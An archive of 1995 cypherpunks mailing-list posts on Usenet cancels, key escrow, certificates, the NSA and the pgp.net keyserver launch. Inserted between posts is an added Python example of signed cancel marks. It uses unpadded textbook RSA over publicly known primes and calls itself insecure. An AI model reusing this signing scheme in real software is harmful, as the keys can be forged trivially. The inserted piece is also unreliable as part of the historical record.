bYt9wnqE0+uywTJb2Z8WUaH+0UfgeE/GNZvDe8jEp6oSUhaBs0R0LA==
=9ZIj
-----END PGP SIGNATURE-----

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|    http://www.rosa.com/~adam    |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA: Confidential,          |communications are preferred for   | 
|secret, not for publication.     |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 5 Oct 95 09:51:45 PDT
To: cypherpunks@toad.com
Subject: Re: Rethinking the utility of netnews "cancel" control messages
Message-ID: <9510051650.AA16253@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Cancel/Supersede is a useful model -- architecting them out of Usenet
is a very bad idea.  Ask Clarinet.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 5 Oct 95 10:06:33 PDT
To: cwe@it.kth.se
Subject: re. GAK - (was Re: Europe)
In-Reply-To: <199510050740.AAA04867@comsec.com>
Message-ID: <9510051703.AA25582@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Wed, 04 Oct 1995 12:58:24 +0100
>From: Christian Wettergren <cwe@it.kth.se>


>| Sweden: The authorities have not yet said anything at all about
>| where they stand in the GAK controversy. Probably very few have
>| heard about it. 

[...]

>So let's go off and think hard about good (culture-related) arguments
>why this is a bad idea. We're gonna have to look really nice, and
>say some sensible things. :-)


Crypto is used for making sure that insiders get in while outsiders are
kept out of encrypted files/messages.

Strong crypto does a better job of keeping outsiders out.

Things like TIS CKE are mechanisms for making sure that insiders continue
to get in, in spite of mishaps with their keys.


Any such system can be evaluated on its technical merits (does it really
separate the insiders from the outsiders as well as it claims to?) (does it
survive various disasters (because if it doesn't survive, it can't keep
insiders in)?)


This is a separate topic from GAK -- which boils down to the Government's
claim that it should be listed as an insider for everybody.


That's what needs to be brought to everyone's attention.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHQP11QXJENzYr45AQGLTwQAnZheg0W7qMbX4SuWExsFuVj9K4bVeBQ0
KV0B+xVY259TMRBU/U6seneQ9hY/xxsqBb+fKLBI99GRcT0+4bun21TprfBiPR2v
bsH/ZK6g3v5pexY8NlOv1bl9FIa1EoytMOVAsJhBtW4hddFa+tcsQSRNAWN2yoXk
u5cGLzUSIx4=
=BY+c
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ulf.Moeller@hamburg.netsurf.de (Ulf Moeller)
Date: Thu, 5 Oct 95 10:09:32 PDT
To: cypherpunks@toad.com
Subject: Re: Elementrix Press Release
In-Reply-To: <306C7A37@hamachi>
Message-ID: <m0t0p9k-000BVpC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


>    "Elementrix has found a logical way to generate non-algorithmic,
>dynamically changing keys at two separate sites without transmitting
>them on the line and without using parallel lines," said Dr. David Kahn,

Obviously they have invented a telepathic key exchange scheme.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 5 Oct 95 10:35:30 PDT
To: fair@clock.org
Subject: Re: Rethinking the utility of netnews "cancel" control messages
Message-ID: <9510051734.AA16383@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I would like to put my corporate legal infrastructure on an internal secure
conferencing system.  News (with crypto-signed articles) is ideal.
Without a "destroy all copies" concept I cannot do this.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 5 Oct 95 12:42:50 PDT
To: "Erik E. Fair" (Time Keeper) <fair@clock.org>
Subject: Re: Rethinking the utility of netnews "cancel" control messages
In-Reply-To: <v02110105ac99c03922dd@[204.179.132.4]>
Message-ID: <199510051942.NAA03482@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 "Erik E. Fair" (Time Keeper) <fair@clock.org> wrote:
> At 9:50 10/5/95, Rich Salz wrote:
> >Cancel/Supersede is a useful model -- architecting them out of Usenet
> >is a very bad idea.  Ask Clarinet.
> 
> Is it? The principal effect of not having the mechanism is a slightly
> higher disk storage requirement for netnews - something completely unheard
> of in the annals of USENET.
> 
> The downsides of having the mechanism (especially unauthenticated) we see
> now: official and unofficial squelching of articles that someone doesn't
> like for whatever arbitrary or situational reason.

<snip>


Look, just replace "cancel" with "mark as worthless and sign".  Then 
each reader may choose to "honor" the "cancel" or not.  If you are 
reading clari.news.world then you completely "honor" cancels signed by 
ClariNet.  If you are reading alt.religion.scientology, then you have 
your user agent specifically bring "cancelled" articles to your 
attention for reading.  :-)


(As an aside this serves for moderation as well.  Just tell your
user agent to honor messages marked as "cancelled, signed Bob The 
Moderator" and you have entered a moderated newsgroup.  And the 
protocol that's gonna bring it to you?  NoCeM and its relatives.  Real 
Soon Now, I think.)


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0

iQCVAwUBMHQ0jfWZSllhfG25AQE5MgP8Chmh7dZkdGmNCGxuL3nrKZsxrv7P8RnK
tJKPUQMEpNyH7Xd4Iu4p5P3HXg3HIxo/73ALewE75cN3Zg8tV2pw0pPovPuE416M
uaTs6FhTgSjh6+v3H/rt/dNqVgMfPAqPqSST3OESH2P2i6C+IkLEr4eglJWkgYJ9
L3bXB6l6IPQ=
=mw+K
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 5 Oct 95 12:46:48 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Rethinking the utility of netnews "cancel" control messages
In-Reply-To: <9510051734.AA16383@sulphur.osf.org>
Message-ID: <199510051946.NAA03604@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> I would like to put my corporate legal infrastructure on an internal secure
> conferencing system.  News (with crypto-signed articles) is ideal.
> Without a "destroy all copies" concept I cannot do this.


Um..  You can't give people copies of something and then destroy all 
copies of that thing unless you can trust those people to destroy
*their* copies of it on your request.  If you *can* trust them to do
this, then the ratings-system solution I mentioned a minute ago will
work.  Just ask everyone to set their useragents to "delete" when they
encounter a "deleted, signed The Boss" mark on an article.


Regards,

Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0

iQCVAwUBMHQ2BfWZSllhfG25AQGD7QP9HtmYVNL0OHvlaPEXzRdFI/XXwzNVjjhK
QnDsK1Gxr9JXnTOORHjOuLNCp4L039UD3S43YU8Jhoo+/Gs1OHhUEK4fOlB9uV6G
QS4kvBSb00ygFSZSuEgyeGVEdlDhHBw9hA06lcc2UC11yU6TM7yZFn6ko3XRrIOR
0I3nIWalaWQ=
=FLQ9
-----END PGP SIGNATURE-----
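
An added example, not part of any message in this archive: a reader-side agent for the "mark and sign" scheme described in the two messages above, with signers identified by a hash of their public key as in the "Certificate proposal" thread. Textbook RSA over fixed, publicly known primes stands in for PGP signatures; the mark format, key values, message IDs, the "example.moderated" group and all function names are assumptions made for the illustration.

```python
import hashlib

E = 65537  # public exponent shared by every constructed key below


def mersenne(k):
    return 2 ** k - 1


def make_key(p, q):
    """Textbook RSA key pair from two primes: returns (public, private)."""
    n = p * q
    return (n, E), (n, pow(E, -1, (p - 1) * (q - 1)))


def digest(payload):
    return int.from_bytes(hashlib.sha256(payload).digest(), "big")


def sign(private, payload):
    n, d = private
    return pow(digest(payload), d, n)


def verify(public, payload, signature):
    n, e = public
    return pow(signature, e, n) == digest(payload)


def fingerprint(public):
    """Self-certifying name of a key: a hash of the public key itself."""
    n, e = public
    return hashlib.sha256(f"{n:x}:{e:x}".encode()).hexdigest()[:16]


def make_mark(public, private, message_id, verdict):
    """A signed rating that travels separately from the article it rates."""
    payload = f"{verdict}\n{message_id}".encode()
    return {"message_id": message_id, "verdict": verdict,
            "key": public, "sig": sign(private, payload)}


def decide(group, message_id, marks, petnames, policy):
    """Return the reader's action for one article: hide, highlight or show."""
    rules = policy.get(group, {})
    for mark in marks:
        if mark["message_id"] != message_id:
            continue
        # The signature covers verdict and message ID, so a mark cannot be
        # re-pointed at another article or carry a swapped-in key.
        payload = f"{mark['verdict']}\n{mark['message_id']}".encode()
        if not verify(mark["key"], payload, mark["sig"]):
            continue
        # The name is looked up locally by key hash; the mark carries no name.
        name = petnames.get(fingerprint(mark["key"]))
        action = (rules.get((name, mark["verdict"]))
                  or rules.get(("*", mark["verdict"])))
        if action:
            return action
    return "show"


# Constructed keys built from Mersenne primes. Their factors are public
# knowledge, so they provide no security; they keep the example deterministic.
CLARINET_PUB, CLARINET_PRIV = make_key(mersenne(127), mersenne(521))
BOB_PUB, BOB_PRIV = make_key(mersenne(107), mersenne(607))
STRANGER_PUB, STRANGER_PRIV = make_key(mersenne(89), mersenne(521))

# The reader's own bindings of key hashes to names, and per-group rules.
PETNAMES = {fingerprint(CLARINET_PUB): "ClariNet",
            fingerprint(BOB_PUB): "Bob The Moderator"}
POLICY = {
    "clari.news.world": {("ClariNet", "cancelled"): "hide"},
    "example.moderated": {("Bob The Moderator", "cancelled"): "hide"},
    # "*" matches any validly signed mark, whoever signed it.
    "alt.religion.scientology": {("*", "cancelled"): "highlight"},
}


def demo():
    good = make_mark(CLARINET_PUB, CLARINET_PRIV, "<a1@clari>", "cancelled")
    # Signed by the stranger, then relabelled with ClariNet's public key.
    forged = dict(make_mark(STRANGER_PUB, STRANGER_PRIV, "<a2@clari>",
                            "cancelled"), key=CLARINET_PUB)
    # A genuine ClariNet mark with its message ID rewritten after signing.
    replayed = dict(good, message_id="<a3@clari>")
    unknown = make_mark(STRANGER_PUB, STRANGER_PRIV, "<a4@clari>", "cancelled")
    ars = make_mark(STRANGER_PUB, STRANGER_PRIV, "<b1@ars>", "cancelled")
    marks = [good, forged, replayed, unknown, ars]

    def act(group, mid):
        return decide(group, mid, marks, PETNAMES, POLICY)

    return {"honored": act("clari.news.world", "<a1@clari>"),
            "forged": act("clari.news.world", "<a2@clari>"),
            "replayed": act("clari.news.world", "<a3@clari>"),
            "unknown_signer": act("clari.news.world", "<a4@clari>"),
            "brought_to_attention": act("alt.religion.scientology", "<b1@ars>")}


if __name__ == "__main__":
    for case, action in demo().items():
        print(f"{case:22s} {action}")
```

Only the mark signed by a key the reader has bound to "ClariNet" hides an article in clari.news.world; the forged, replayed and unknown-signer marks leave the article visible.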




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 5 Oct 95 10:53:31 PDT
To: cypherpunks@toad.com
Subject: SSL telnet vs. SSH. Comparison?
Message-ID: <199510051751.NAA03127@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Would somebody please compare for me SSL telnet vs. SSH in terms of
security, advantages, and disadvantages?

Thanks,
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHQbESoZzwIn1bdtAQFgxgF/bx0sbAWQ2mFbwaSqcKSolepKNCC/kiNm
22gizTztznICXRPxh17VxkpiWwzcRZPv
=QD3j
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 5 Oct 95 11:56:37 PDT
To: Rick Johnson <rickj@microsoft.com>
Subject: Re: Comments on STT Spec Implementation Details
In-Reply-To: <9510040519.AA05397@netmail2.microsoft.com>
Message-ID: <199510051855.OAA05477@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rick Johnson writes:
> We're very interested in feedback and specifics on this.  We worked to 
> keep _only_ the detail we felt required to implement STT -- the 
> language is intentionally terse.  However, it is in everyone's best 
> interest that the STT spec is completely understood and implementable.

My suggestion, which I made when Microsoft made a presentation at the
IETF meeting in Stockholm and then had the gall to say "oh, no, we
don't intend to publish an internet draft" is that you publish this as
an internet draft and try to shepherd it through the IETF's
standardization process. You will, of course, be savaged, but that is
in the interests of everyone, including you.

The belief that companies can make more money by following proprietary
solutions and imposing them on the world as standards is falling
away. It is in Microsoft's interest that the standard that is adopted
for commerce be open, publicly discussed at length, and brutally
critiqued. Losing a bit of control in exchange for actually getting
something that works out for you and your customers is in your interest.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Thu, 5 Oct 95 15:19:33 PDT
To: cypherpunks-announce@toad.com
Subject: Oct 14 mtg - focus on java
Message-ID: <199510052213.PAA26024@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi -

The Oct 14 cypherpunks meeting will be focussing on Java topics. 
I'm putting together an agenda, and finalizing the meeting location. 

It looks like we'll have someone from the Java group at Sun to talk about
what the current Java security policy is, and about Java and HotJava
security mechanisms. 

Doug Barnes and Amanda Chou will talk about JCrypt, which is a set
of Java wrappers for existing C encryption routines.  

If you'd like to talk at the Oct 14 meeting, please send me email with a 
description of your project, and I'll schedule you in.   

I'll send out mail early next week with the agenda, and letting you know
where the meeting will be held.    I'm trying to get a large conference
room at one of the Sun facilities. 

Marianne
mrm@netcom.com 
mrm@eng.sun.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 5 Oct 95 16:07:56 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <3074646C.2418@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> (...WAY behind in cypherpunks mail...)
> 
> Carl Ellison <cme@TIS.COM> writes:
> >Let me propose an alternative unique name: the public key (or a good hash
> >of it).  The public key has an advantage over both X.509 and PGP names.
> >The binding between it and its human being is testable.  You can challenge
> >the human in question to sign something.
> 
> I don't understand this whole discussion.  A certificate is a signed
> binding of a key and a unique name, right?  If the proposal here is
> that the unique name be a hash of the key, you are suggesting a signed
> binding of a key with its hash!  What is the point of a certificate
> which binds a key to its hash?  What is such a certificate asserting?
> It seems to be saying nothing at all.  Anybody can already tell if a
> hash is right, for all the good that does you.  It's like a notarized
> statement that 2+2=4.  I don't see the point.  As Carl goes on to say:
> 
> >Assuming you use a public key as the unique name, you end up with a much
> >simplified certificate.  In fact, the notion of "certificate" may go away,
> >in the sense that the certificate binds a key to a person through a unique
> >name.  The person binds himself to his key, on challenge (or on any message
> >signature).
> 
> If in fact this is just a suggestion that we not have certificates, that
> may have some value.  But as a literal suggestion that certificates bind
> a key hash to a key, that just doesn't make sense to me.
> 
> The thing to keep in mind is, why do we want certificates?  Why not just
> use unsigned keys?  If I encrypt a message for Carl based on some key I
> found lying around somewhere which someone told me is his, and I send it
> to his mailbox, and I get a reply back, how secure is that?  We all know
> that you don't get the full security of the encryption if you do this.
> Man in the middle attacks might not be easy to do in such a situation but
> they are certainly possible.  It is such attacks that certificates (including
> PGP key signatures) are designed to prevent.
> 
> I'd like to see some grounding of this discussion in terms of the role of
> certificates, and ways to prevent man in the middle attacks.  I certainly
> have no love for fascist worldwide ID cards and hierarchical, organization
> based naming schemes, but just using any old key because it seems to work
> OK most of the time isn't going to fly IMO.

  I think the old idea of a certificate just binding a name and
a key is turning out to not be very useful.  That is why Netscape
Navigator 2.0 will support x509 version 3 certificates.  They allow
arbitrary attributes to be signed into a certificate.  In this new
world, you can think of a certificate as a way of binding a key with
various arbitrary attributes, one of which may be (but is not
required to be) a name.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Thu, 5 Oct 95 16:43:08 PDT
To: cypherpunks@toad.com
Subject: Secure Drive questions...
Message-ID: <Pine.SUN.3.91.951005160110.26476B-100000@dorsai.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


Hi, I recently got me a much larger hard drive and would like to encrypt 
more than one partition using SecureDrive.  I'm using an old 1.1 version 
which, when I log into one partition, the others vanish.  I'm using the 
same passphrase on both partitions.

I've never upgraded because the previous version did what I wanted it to 
do very well and I have never had a problem with it.  I've noticed that 
on some machines SecureDevice failed where SecureDrive 1.1 worked 
perfectly...  So I've stuck with that... but now, I'd rather not join the 
two partitions together if I can help it... too much work to copy 
everything off, repartition, restore, etc...  (This is a 1.2Gb WD Caviar 
drive using the Disk Manager crud that makes the drive visible to DOS by 
loading some DMDRVR.BIN driver only - my BIOS only sees 550Mb or so 
without it...)

Is this a question of upgrading, if so, what's the latest version?  And 
are there any catches, snags, or problems to watch out for before I 
potentially kill my drives? :-)

A few more questions, I've left a bit of space for me to experiment with 
something like OS/2Warp or Win95 or even Netware 4.1 (got a cool 2 user 
license for $50 from Novell I'd like to install.)  Now while OS/2 and 
Win95 can see FAT partitions, what will stop them from trying to run 
something like chkdsk on it?  Can I load the secure drive tsr to keep the 
encrypted drive safe with those operating systems?  

(I know Netware will keep its mitts off non-Netware partitions, so that's 
a safe bet - but then I don't have another PC to use as a host so this will
be a clientless server. Just want to experiment with it I guess...  :-)

I'd also consider messing with NT, I have enough RAM and space, but 
anyone know a place I can get a good price for it? $400 is a bit steep 
for an OS I probably won't do much with.

And YES, I will install Linux - soon as I can get it to recognize my 
I/O-less FutureDomain clone SCSI controller. (It's based on the 950 chip, 
no I/O address, uses int 15 and DMA for transfers..)   Works okay under 
Coherent - then again, I'm using the IDE controller under Coherent... :-)
The SCSI FD controller is for the CDROM drive...

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@robo.remailer
Date: Thu, 5 Oct 95 16:18:09 PDT
To: cypherpunks@toad.com
Subject: Re: Comments on STT Spec Implementation Details
Message-ID: <199510052312.QAA08154@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Responding to msg by perry@piermont.com:

[snip]

>The belief that companies can make more money by 
>following proprietary  solutions and imposing them on 
>the world as standards is falling  away. It is in 
>Microsoft's interest that the standard that is adopted  
>for commerce be open, publicly discussed at length, 
>and brutally  critiqued. Losing a bit of control in 
>exchange for actually getting  something that works out 
>for you and your customers is in your interest.


The spew through the proprietary dike on this is
swelling: MasterCard's consortium yesterday and the
NetManage/Cylink today both emphasize public availability
of specs in counter-response to the flaws helpfully
discovered in Netscape by the ever public spirited
cypherpunks.

Whether any of these vaunted "superior" systems respond
to attacks as constructively as Netscape will be the
challenge.

BTW, has anyone reviewed the promised MasterCard specs
supposedly released on Tuesday?











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 5 Oct 95 13:37:46 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: NSA Realists v. Nuts (Was: Re: Crypto APIs)
In-Reply-To: <199510050757.DAA22982@ducie.cs.umass.edu>
Message-ID: <199510052037.QAA05653@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Futplex writes:
> Matt Blaze writes:
> # It seems best to encourage the realistic side of NSA as much as possible...
> 
> James Donald writes:
> > Why? Surely the realists are more dangerous than the nuts.
> 
> One way to look at it is this:
> 
> Could a Nutty NSA carry out its Nutty Agenda ?

I'd like to say the following: I don't think the NSA is inherently the
enemy at all. Signals intelligence and protecting the U.S. and its
citizens from signals intelligence is probably necessary. As a radical
libertarian, I'd like to see these activities carried out in the
private sector, but that's another story.

The real problem with the NSA is the same as the problem with the FBI
re: digital telephony. They've gotten used to a certain model of how
the world works and rather than adapt to new times where most people
have access to strong crypto, they have decided to use the laws to try
to retard the inevitable.

I'm sure some NSA types are listening, so let me say this: there is no
way on earth to stop the progress of a technology whose time has
come. I've heard an idiot from the FBI actually say in public, in
response to statements that the vast amount of open literature makes
it impossible to stop bright 14 year olds from writing good crypto
code, that "we aren't going to just accept this". Well, go off and
accept reality, folks. You can't stop strong cryptography from being
in the hands of the public. What you can do, however, is cost the
nation and the world billions if not trillions in damage. If crypto
had been in cellphone signaling equipment earlier billions in stolen
cellphone calls would have been saved -- ditto for credit card
systems. All you can succeed in doing is leeching the economy white
while trying to save a model that is doomed. You can't stop strong
crypto any more than the horseshoe makers could stop the automobile.

Learn to live with a new model for how you work now, and you will save
years of bitter and futile agony for everyone.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 5 Oct 95 14:02:45 PDT
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: NSA Realists v. Nuts (Was: Re: Crypto APIs)
In-Reply-To: <199510051433.HAA11813@blob.best.net>
Message-ID: <199510052102.RAA05690@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" writes:
> If that is the case, then the "Nutty Agenda" is perfectly sane.  They 
> want to rule over us.  There is nothing crazy about that. Evil yes.  
> Crazy no.  Their objective is to create a surveillance state, where 
> all actions are known and recorded by the state, in order to 
> facilitate detailed state control over every aspect of our lives.  Our 
> agenda is the opposite.  There is no commonality of purpose, hence no 
> possibility of cooperation.   

I disagree. Most NSA types are probably stock government employees who
want to get their job done with the least muss and fuss. Some of them
actually have pride in their work. Very few of them are likely
actively evil.

Just as I tend to see all computer systems installations in terms of
securing them from attack (a couple of clients have noted I have
security on the brain!), I suspect they see all things in the world in
terms of signals intelligence. Whenever anything comes up that
threatens their day to day way of doing things, they react badly --
it's very natural. They don't want their work made hard or, even worse,
their jobs destroyed.

Certainly some of their masters at some times have been evil, and will
continue to be in the future, just as in any governmental
organization. Certainly some individuals working in the organization
are evil. However, in general, what you are looking at is just the
result of an entity trying to preserve itself having access to
governmental force. I doubt that there are many "national domination"
types in the agency, and there don't need to be for their agenda to be
opposed to ours.

I'll point out, though, that if anything this makes our job harder,
because strong crypto in the hands of the bulk of the world's
population will cost some jobs at NSA, and the only thing harder to
dissuade than an evil madman is someone worrying about how he is going
to feed his kids once he's forced out of the government sector. Such
people will say almost anything to preserve their agency.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Leyland <pcl@sable.ox.ac.uk>
Date: Thu, 5 Oct 95 09:23:42 PDT
To: cypherpunks@toad.com
Subject: Announcement: keys.pgp.net
Message-ID: <199510051621.RAA18321@sable.ox.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



First the summary for those people who don't like reading more than one
paragraph. The address pgp-public-keys@keys.pgp.net reaches one of
several email keyservers.  pgp-public-keys@keys.<country>.pgp.net goes
only to key servers for <country>.  A start has been made on other
services such as ftp.pgp.net.  In particular, see http://www.pgp.net/pgp
for more information.


The domain "pgp.net" was registered last year in preparation for
providing a simple and unified name space for PGP infrastructure such as
key servers, software distribution sites and so on.

The first steps to populate the pgp.net domain have now been taken.
They are small steps, but we believe, important ones.  Many more will be
taken over the next few months.  The first additions are for the email
public key server network. The key servers are presently known by a
number of different names, none of which are particularly obvious to the
uninitiated.  Worse, many of them are run by students or employees
without the official backing of their host organizations.  It's not
surprising that some are unreliable and/or short-lived.  A recent
development, however, is that more and more servers are being run by
CERT teams.  Examples include those run by DFN-CERT (Germany), CERT-NL
(Netherlands) and OxCERT (Oxford University).  It is in the best
interests of the teams that the keyservers be reliable and available.
The validity of the keys themselves, of course, must be checked by their
users with the usual signature checking built into PGP.

We have, therefore, set up "keys.pgp.net" as a set of equal-priority MX
records in the DNS.  What this means, in practice, is that email sent to
pgp-public-keys@keys.pgp.net will be sent to a randomly chosen
keyserver.  It probably doesn't matter which one, as the servers are
synchronized.  If the first server your mail system tries is not
available, it should automatically try the other servers until one
works.  This should give a rather more rapid and successful response than
the current mechanism.  It is also rather easier for documentation
writers, FAQ maintainers and such like to give advice which has a long
shelf-life.

We recognize that, for efficiency reasons, users of key servers might
want to be able to specify a local machine rather than be handed a
randomly selected one.  The old names will continue to work: the address
pgp.ox.ac.uk (for example) will continue to reach the OxCERT keyserver
and no others.  However, we have also registered sub-domains of pgp.net.
In particular, the records for "whatever.uk.pgp.net" will only map to
machines for the United Kingdom.  At the moment we have the following
records in place, with the expectation that more will follow:

   keys.de.pgp.net      Germany          DFN-CERT
   keys.no.pgp.net      Norway           Univ. of Tromso
   keys.uk.pgp.net      United Kingdom   OxCERT, Oxford
   keys.us.pgp.net      United States    MIT

Large regions, such as the US, will eventually have several servers,
each of which will be the target of equal priority MX records.   We
expect the Netherlands to join in with keys.nl.pgp.net very shortly.

Allocation of key servers to the pgp.net domain is only the first step.
Plans are advanced to set up a number of other sub-domains, all with the
format <service>[.<region>].pgp.net.  This structure allows for local
customization and yet preserves the uniformity and simplicity of the
naming scheme.  For instance, the Web-site www.de.pgp.net would,
presumably, have the text of the pages in German and would be the site
recommended in German documentation, while ftp.no.pgp.net would be the
principal archive of PGP-related material in Norway.

So far, only ftp.pgp.net and www.pgp.net have been allocated.   The URL
http://www.pgp.net/pgp has more information on the pgp.net domain as it
currently exists and will be kept up to date as the domain becomes more
populated.

Expect to see more developments along these lines later this year; all
will be reported on http://www.pgp.net/pgp

The following folk all had a hand in the initial stages of setting up
pgp.net:


Piete Brooks              University of Cambridge, United Kingdom
Borge Brunes              University of Tromso, Norway
Klaus-Peter Kossakowski   DFN-CERT, Germany
Brian LaMacchia           MIT, United States of America
Paul Leyland              OxCERT, United Kingdom
Teun Nijssen              CERT-NL, Netherlands




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Cheng <jcheng@pipeline.com>
Date: Thu, 5 Oct 95 14:22:50 PDT
To: cypherpunks@toad.com
Subject: is this a bug of Netscape
Message-ID: <Pine.3.89.9510051715.A1420-0100000@pipe6>
MIME-Version: 1.0
Content-Type: text/plain


If you go to http://c.gp.cs.cmu.edu:5103/prog/webster, you will get an
input textbox and two buttons; leave the textbox blank and push the Look Up
Definition button, and you will get a GPF?
I am using Netscape V1.2N for Windows.
Sorry if you already knew it.

J





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 5 Oct 95 17:41:02 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <199510060039.RAA18405@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein <jsw@netscape.com> writes:
>  I think the old idea of a certificate just binding a name and
>a key is turning out to not be very useful.  That is why Netscape
>Navigator 2.0 will support x509 version 3 certificates.  They allow
>arbitrary attributes to be signed into a certificate.  In this new
>world, you can think of a certificate as a way of binding a key with
>various arbitrary attributes, one of which may be (but is not
>required to be) a name.

OK, so suppose I want to send my credit card number to Egghead Software.
I get one of these new-fangled certificates from somebody, in which
VeriSign has certified that key 0x12345678 has hash 0x54321.  I think we
can agree that by itself this is not useful.  So, it will also bind in
some attribute.  What will that attribute be?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 5 Oct 95 17:56:42 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <199510051924.MAA25839@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951005174118.5095B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
> The thing to keep in mind is, why do we want certificates?  Why not just
> use unsigned keys?  If I encrypt a message for Carl based on some key I
> found lying around somewhere which someone told me is his, and I send it
> to his mailbox, and I get a reply back, how secure is that?  We all know
> that you don't get the full security of the encryption if you do this.
> Man in the middle attacks might not be easy to do in such a situation but
> they are certainly possible.  It is such attacks that certificates (including
> PGP key signatures) are designed to prevent.

